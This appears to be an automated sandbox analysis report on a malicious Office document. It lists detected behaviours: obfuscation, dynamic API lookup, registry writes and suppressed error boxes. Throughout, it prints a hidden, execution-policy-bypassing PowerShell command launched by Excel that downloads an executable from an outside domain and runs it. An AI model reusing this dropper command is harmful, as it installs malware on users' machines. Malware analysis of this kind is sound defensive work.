Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_004449B3 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,35_2_004449B3
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_0281D1B8 push eax; iretd 30_2_0281D1B9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_02819127 push ebp; retf 30_2_0281913D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_0281497B push 200281C3h; ret 30_2_028149D5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 30_2_051299E0 pushfd ; iretd 30_2_051299E1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_0156912C push ecx; retf 33_2_01569131
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F37E20 pushad ; ret 33_2_02F37E35
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 33_2_02F37E00 pushad ; ret 33_2_02F37E15
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_00445190 push eax; ret 35_2_004451A4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_00445190 push eax; ret 35_2_004451CC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_00449EB4 push eax; ret 35_2_00449EC1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_00444F79 push ecx; ret 35_2_00444F89
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_00445190 push eax; ret 36_2_004451A4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_00445190 push eax; ret 36_2_004451CC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_00449EB4 push eax; ret 36_2_00449EC1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_00444F79 push ecx; ret 36_2_00444F89

Persistence and Installation Behavior:

barindex
Tries to download and execute files (via powershell)Show sources
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://pivotpower24.com/mytbay/pikin/pikin.exe',$env:Temp+'\qCXSc.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\qCXSc.Exe')
Drops PE filesShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\qCXSc.ExeJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_00403BC7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,35_2_00403BC7
Stores large binary data to the registryShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems ,++
Disables application error messsages (SetErrorMode)Show sources
<
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
